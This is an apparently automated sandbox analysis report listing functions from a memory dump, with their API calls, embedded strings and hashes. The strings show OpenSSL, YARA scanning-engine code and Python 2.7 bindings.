Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast_errnofopen$_wfopen
String ID:
API String ID: 1544496049-0
Opcode ID: c14250dfcdb1f5f92c6396247f52055178e00af6e299cc1f3d872091036c9c88
Instruction ID: 42be16cc166cf0282657c712483a73143fbbdc6c010dfb3b345dffaf78b47c34
Opcode Fuzzy Hash: c14250dfcdb1f5f92c6396247f52055178e00af6e299cc1f3d872091036c9c88
Instruction Fuzzy Hash: AF41C732A40209DBDB119BA5DC95BFEB7B9EF45300F44416AFA05EB380DB319D46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E00DD0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 114stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCR90 ref: 02E00DE3
isspace.MSVCR90 ref: 02E00E11
isspace.MSVCR90 ref: 02E00E26
isspace.MSVCR90 ref: 02E00E55
isspace.MSVCR90 ref: 02E00E67
isspace.MSVCR90 ref: 02E00E79
isspace.MSVCR90 ref: 02E00E93
memcpy.MSVCR90 ref: 02E00EC4

Strings

..\..\openssl-1.1.0e\crypto\asn1\asn_moid.c, xrefs: 02E00EA9

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: isspace$memcpystrrchr
String ID: ..\..\openssl-1.1.0e\crypto\asn1\asn_moid.c
API String ID: 3868098041-994196654
Opcode ID: 38685a968d2f2cb4a16ba7b1e941bed5f0e096a22dec01d70f020ac4e53019d7
Instruction ID: 96878f54e5f7583bb05f46060226a89ea1c2e2c2cabee2d8e66e29fb3939987e
Opcode Fuzzy Hash: 38685a968d2f2cb4a16ba7b1e941bed5f0e096a22dec01d70f020ac4e53019d7
Instruction Fuzzy Hash: 54317CA298435517EB212A719CC07777B99CB8124DF08943CFD858A3C2FF26D58386F2

Uniqueness

Uniqueness Score: -1.00%

Function 02D417A0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON27(?,02E55188), ref: 02D417B9
PyErr_Format.PYTHON27(?,'Match' objects must be compared with objects of the same class), ref: 02D417D3
PyObject_RichCompareBool.PYTHON27(?,?,00000002), ref: 02D4180A
PyObject_RichCompareBool.PYTHON27(?,?,00000002), ref: 02D4181D

Strings

'Match' objects must be compared with objects of the same class, xrefs: 02D417CD

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: BoolCompareObject_Rich$Err_FormatSubtypeType_
String ID: 'Match' objects must be compared with objects of the same class
API String ID: 966302056-74632398
Opcode ID: 16677ce08df3b1905119994116976d9c2fc8f8c7095a3958e8532511eec079e0
Instruction ID: 5b93e5f661e44c0603c456918af41ac7b5ae79b317bc22b7ef848bf96baa09a6
Opcode Fuzzy Hash: 16677ce08df3b1905119994116976d9c2fc8f8c7095a3958e8532511eec079e0
Instruction Fuzzy Hash: B731837A790301ABD610CB56ECC1E16B3A5FBC4361B648966EE1883344D735ECA6CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D89630, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 108libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?), ref: 02D89658
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 02D89668
GetProcessWindowStation.USER32 ref: 02D8968C
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?), ref: 02D896A7
GetLastError.KERNEL32 ref: 02D896B5
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?), ref: 02D896EA
wcsstr.MSVCR90 ref: 02D8970C

Strings

_OPENSSL_isservice, xrefs: 02D89662
Service-0x, xrefs: 02D89702

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindowwcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 459917433-1672312481
Opcode ID: 2386a89b8648b8cb9d9127de9d1609dff5212c978c5d402641217a43b0853b1f
Instruction ID: 1e67a7e776bf7e2d93e212bd34edc9e712ef383a5fb7cae6c66681708dc3ff49
Opcode Fuzzy Hash: 2386a89b8648b8cb9d9127de9d1609dff5212c978c5d402641217a43b0853b1f
Instruction Fuzzy Hash: 19313971A80209ABCB10DFBA9C95FAE73A8EB45310F904B65F556D23C0DB309991CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02D99F20, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02DB82D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000,00000000,00000001,?,?,02D99F33,?,00000001,00000000,?), ref: 02DB8326
Part of subcall function 02DB82D0: GetLastError.KERNEL32(?,02D99F33,?,00000001,00000000,?,?,?,02DAFC93,?,02E2B7D4,?,02DAFCF2,?,00000002,?), ref: 02DB832E
Part of subcall function 02DB82D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,02D99F33,?,00000001,00000000,?,?,?,02DAFC93,?), ref: 02DB8352
Part of subcall function 02DB82D0: GetLastError.KERNEL32(?,02D99F33,?,00000001,00000000,?,?,?,02DAFC93,?,02E2B7D4,?,02DAFCF2,?,00000002,?), ref: 02DB835A
Part of subcall function 02DB82D0: fopen.MSVCR90 ref: 02DB8373

strchr.MSVCR90 ref: 02D99F3D
GetLastError.KERNEL32(..\..\openssl-1.1.0e\crypto\bio\bss_file.c,0000004A), ref: 02D99F5B
_errno.MSVCR90 ref: 02D99F86
_errno.MSVCR90 ref: 02D99F90

Strings

fopen(', xrefs: 02D99F77
..\..\openssl-1.1.0e\crypto\bio\bss_file.c, xrefs: 02D99F56, 02D99F9C, 02D99FB8
',', xrefs: 02D99F71

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$ByteCharMultiWide_errno$fopenstrchr
String ID: ','$..\..\openssl-1.1.0e\crypto\bio\bss_file.c$fopen('
API String ID: 67969700-1337701112
Opcode ID: 9d2bfc9587a7943037bbafecc8bc0e4cee40dd8cbd06cabe54a659b9a463ac5b
Instruction ID: 08113ccb9552064071653960f2aa60dd181da3354272271be7c8eee6993f8743
Opcode Fuzzy Hash: 9d2bfc9587a7943037bbafecc8bc0e4cee40dd8cbd06cabe54a659b9a463ac5b
Instruction Fuzzy Hash: BA210872BC032436F62035A56C47F9B774ACB41F76F048176FB06A92C1F692885586B2

Uniqueness

Uniqueness Score: -1.00%

Function 02D4DEE0, Relevance: 13.9, APIs: 1, Strings: 8, Instructions: 448COMMON

Download Yara Rule

Strings

wrong type "integer" for | operator, xrefs: 02D4DF0E
wrong type "boolean" for | operator, xrefs: 02D4E001
wrong type "boolean" for | operator, xrefs: 02D4DF67
wrong type "string" for | operator, xrefs: 02D4DF52
wrong type "string" for | operator, xrefs: 02D4DFE2
wrong type "float" for | operator, xrefs: 02D4DF33
wrong type "integer" for | operator, xrefs: 02D4DFA8
wrong type "float" for | operator, xrefs: 02D4DFBD

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for | operator$wrong type "boolean" for | operator$wrong type "float" for | operator$wrong type "float" for | operator$wrong type "integer" for | operator$wrong type "integer" for | operator$wrong type "string" for | operator$wrong type "string" for | operator
API String ID: 0-2742613685
Opcode ID: e11bcf9e74ed3357384c211745a28c4a18905db56714191f54d86fe08c5ac0ae
Instruction ID: 400f91768a235795c2875559491a863d27265b85bb1f7a0c37ba635dad9bf320
Opcode Fuzzy Hash: e11bcf9e74ed3357384c211745a28c4a18905db56714191f54d86fe08c5ac0ae
Instruction Fuzzy Hash: 87126FB09083419FD714CF14C480A6AB7E5FF88704F548A6EE9898B351EB70DD96CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 02D4DD4E, Relevance: 13.9, APIs: 1, Strings: 8, Instructions: 448COMMON

Download Yara Rule

Strings

wrong type "boolean" for ^ operator, xrefs: 02D4DE6F
wrong type "string" for ^ operator, xrefs: 02D4DDC0
wrong type "integer" for ^ operator, xrefs: 02D4DD7C
wrong type "integer" for ^ operator, xrefs: 02D4DE16
wrong type "float" for ^ operator, xrefs: 02D4DE2B
wrong type "boolean" for ^ operator, xrefs: 02D4DDD5
wrong type "string" for ^ operator, xrefs: 02D4DE50
wrong type "float" for ^ operator, xrefs: 02D4DDA1

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for ^ operator$wrong type "boolean" for ^ operator$wrong type "float" for ^ operator$wrong type "float" for ^ operator$wrong type "integer" for ^ operator$wrong type "integer" for ^ operator$wrong type "string" for ^ operator$wrong type "string" for ^ operator
API String ID: 0-842975192
Opcode ID: 5df6a740463caa223df2249ba94858baad230164ade7d240aeb26c28ba545a13
Instruction ID: 248436c714f8cb4309846afbba758ab1969dca812614655b38ca7c4f25720303
Opcode Fuzzy Hash: 5df6a740463caa223df2249ba94858baad230164ade7d240aeb26c28ba545a13
Instruction Fuzzy Hash: F9126DB09083419FD714CF14C480B6AB7E5FF88704F548A6EE9898B351EB70D996CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 02D4BD83, Relevance: 13.9, APIs: 1, Strings: 8, Instructions: 437COMMON

Download Yara Rule

Strings

wrong type "integer" for matches operator, xrefs: 02D4BE44
wrong type "boolean" for matches operator, xrefs: 02D4BE01
wrong type "string" for matches operator, xrefs: 02D4BDE2
wrong type "float" for matches operator, xrefs: 02D4BDBD
wrong type "boolean" for matches operator, xrefs: 02D4BE9A
wrong type "string" for matches operator, xrefs: 02D4BE7B
wrong type "integer" for matches operator, xrefs: 02D4BDAB
wrong type "float" for matches operator, xrefs: 02D4BE56

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for matches operator$wrong type "boolean" for matches operator$wrong type "float" for matches operator$wrong type "float" for matches operator$wrong type "integer" for matches operator$wrong type "integer" for matches operator$wrong type "string" for matches operator$wrong type "string" for matches operator
API String ID: 0-1871212892
Opcode ID: 3a219e2e0a6bd3114335e2c024ce0ff063fa0bbaafc08ad4f062b1c92c7924f6
Instruction ID: 5cbba5ff5a4d26bd2c1803b299fb4f2b2dc144e43c6f51322118f6fb18b06b21
Opcode Fuzzy Hash: 3a219e2e0a6bd3114335e2c024ce0ff063fa0bbaafc08ad4f062b1c92c7924f6
Instruction Fuzzy Hash: 43026EB09083019FD714CF14C480B6AB7E5FF88704F548A6EE9898B355EB71DD96CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02D4BEED, Relevance: 13.9, APIs: 1, Strings: 8, Instructions: 434COMMON

Download Yara Rule

Strings

wrong type "boolean" for contains operator, xrefs: 02D4BF6B
wrong type "integer" for contains operator, xrefs: 02D4BFB2
wrong type "float" for contains operator, xrefs: 02D4BFC7
wrong type "string" for contains operator, xrefs: 02D4BF4C
wrong type "string" for contains operator, xrefs: 02D4BFEC
wrong type "float" for contains operator, xrefs: 02D4BF27
wrong type "integer" for contains operator, xrefs: 02D4BF15
wrong type "boolean" for contains operator, xrefs: 02D4C00B

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: wrong type "boolean" for contains operator$wrong type "boolean" for contains operator$wrong type "float" for contains operator$wrong type "float" for contains operator$wrong type "integer" for contains operator$wrong type "integer" for contains operator$wrong type "string" for contains operator$wrong type "string" for contains operator
API String ID: 0-4220623751
Opcode ID: 7160da9da08bcc092f75419b9480d89003df9d5042507904d6419c4c189ae62e
Instruction ID: 7f9e02bccdf51bcc278db373246fd119aa28de0d7fbc60576e875f0b565fbce6
Opcode Fuzzy Hash: 7160da9da08bcc092f75419b9480d89003df9d5042507904d6419c4c189ae62e
Instruction Fuzzy Hash: 9F026EB09083019FD714CF14C480B6AB7E5FF88704F548A6EE9898B355EB71DD96CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02D46620, Relevance: 13.6, APIs: 9, Instructions: 87fileCOMMON

Download Yara Rule

APIs

fopen.MSVCR90 ref: 02D4662B
fseek.MSVCR90 ref: 02D4664C
ftell.MSVCR90 ref: 02D4664F
fseek.MSVCR90 ref: 02D4665C
fclose.MSVCR90 ref: 02D46667

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: fseek$fclosefopenftell
String ID:
API String ID: 821468074-0
Opcode ID: 388a7e6cec497afbc4b1288350f88fe9f226f337e2edf3ae0286192634577479
Instruction ID: 0e7c31a96328d3a2df6a7b2eff4d26474b6cfb66f7fd81013fb8c975ae504900
Opcode Fuzzy Hash: 388a7e6cec497afbc4b1288350f88fe9f226f337e2edf3ae0286192634577479
Instruction Fuzzy Hash: 23216B72A815106BD61067A9BCC8FDB775CDB89720F540562F90A82245E722EC9AC5B1

Uniqueness

Uniqueness Score: -1.00%

Function 02D461A0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

printf.MSVCR90 ref: 02D461E3
printf.MSVCR90 ref: 02D461ED
printf.MSVCR90 ref: 02D46215
printf.MSVCR90 ref: 02D46221

Strings

%02X, xrefs: 02D46246
AND, xrefs: 02D461D7

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: printf
String ID: %02X$AND
API String ID: 3524737521-2084899897
Opcode ID: 445e9ca87ba24d8a2864c679d3310d62286c3d01fb38bba89f50f28f1faf4986
Instruction ID: b737af7e1494c4c8a39bf8ce2776f1d9802dfe760ee2970d920e6611866e9e5c
Opcode Fuzzy Hash: 445e9ca87ba24d8a2864c679d3310d62286c3d01fb38bba89f50f28f1faf4986
Instruction Fuzzy Hash: 0B112B31DC452077E211465869817A7F75D9F86608F98C116DC8F12703DA22E892C6E3

Uniqueness

Uniqueness Score: -1.00%

Function 02D554E0, Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 330COMMON

Download Yara Rule

APIs

_snprintf.MSVCR90 ref: 02D55676

Part of subcall function 02D552B0: memset.MSVCR90 ref: 02D55382
Part of subcall function 02D552B0: memset.MSVCR90 ref: 02D55397

Strings

greedy and ungreedy quantifiers can't be mixed in a regular expression, xrefs: 02D556C0
%s contains .* or .+, consider using .{,N} or .{1,N} with a reasonable value for N, xrefs: 02D55704
%s in rule %s is slowing down scanning, xrefs: 02D558DF
hex string, xrefs: 02D55648
invalid %s "%s": %s, xrefs: 02D55664
regular expression, xrefs: 02D55651, 02D55663

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snprintf
String ID: %s contains .* or .+, consider using .{,N} or .{1,N} with a reasonable value for N$%s in rule %s is slowing down scanning$greedy and ungreedy quantifiers can't be mixed in a regular expression$hex string$invalid %s "%s": %s$regular expression
API String ID: 516210214-3447789961
Opcode ID: de32bd4dce2fdb429a5463de882662fdcd699f705a87b21416685d3bd01fcf27
Instruction ID: ac506b2dfa31714a3ad06b35f27450ebaba3dd12da061426c88476518d73c600
Opcode Fuzzy Hash: de32bd4dce2fdb429a5463de882662fdcd699f705a87b21416685d3bd01fcf27
Instruction Fuzzy Hash: 8DC1A071A043519FDB26DE54D880BABB7E9EB84318F84491CFD8887341E7B4ED05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02D46380, Relevance: 10.6, APIs: 7, Instructions: 78COMMON

Download Yara Rule

APIs

_sopen_s.MSVCR90 ref: 02D4639F
_filelength.MSVCR90 ref: 02D463B7
_close.MSVCR90 ref: 02D463CC

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: _close_filelength_sopen_s
String ID:
API String ID: 1367608944-0
Opcode ID: 85bb6dd0928432c600532971cba29a9439cbacdc98b3caeb055653904e806a16
Instruction ID: 2dd9420eb9502ce03dd766b716af15508e5c54bfc2756f13c4f0a566cce07d4e
Opcode Fuzzy Hash: 85bb6dd0928432c600532971cba29a9439cbacdc98b3caeb055653904e806a16
Instruction Fuzzy Hash: AC11EBB26442016BC710DBB8EC4898B7798EFC4771F644B29F55BC22C0DB31E8A5C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 02D410E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PyGILState_Ensure.PYTHON27 ref: 02D41110
_PyObject_CallMethod_SizeT.PYTHON27(?,read,02E55564,?), ref: 02D41124
PyGILState_Release.PYTHON27(00000000), ref: 02D4112D
PyString_AsStringAndSize.PYTHON27(00000000,?,?), ref: 02D41145
memcpy.MSVCR90 ref: 02D41164

Strings

read, xrefs: 02D4111C

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: SizeState_$CallEnsureMethod_Object_ReleaseStringString_memcpy
String ID: read
API String ID: 3747437082-2555855207
Opcode ID: 06df71ebd445eceeba204edb4c5397326962a17d3ae5ea9ebee45431bf378187
Instruction ID: 06eda134851c6be288633a6409c1f9b26386afab3346d6cad3ab81f8fdf9d0d8
Opcode Fuzzy Hash: 06df71ebd445eceeba204edb4c5397326962a17d3ae5ea9ebee45431bf378187
Instruction Fuzzy Hash: 10218D719403019BD710DF24D8809ABB3E4FB84264F540F1AF8A982240D735DE8ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02D41DB0, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 39COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON27(02A9A968,line %d: %s,?,?), ref: 02D41DF7

Strings

line %d: %s, xrefs: 02D41E2F
%s(%d): %s, xrefs: 02D41E16
%s(%d): %s, xrefs: 02D41DD8
line %d: %s, xrefs: 02D41DF1

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_Format
String ID: %s(%d): %s$%s(%d): %s$line %d: %s$line %d: %s
API String ID: 376477240-977165427
Opcode ID: 95b8984b489447ebb2d485b42fb5c920adb3deb909ac3d899f399a88ca7fe6fc
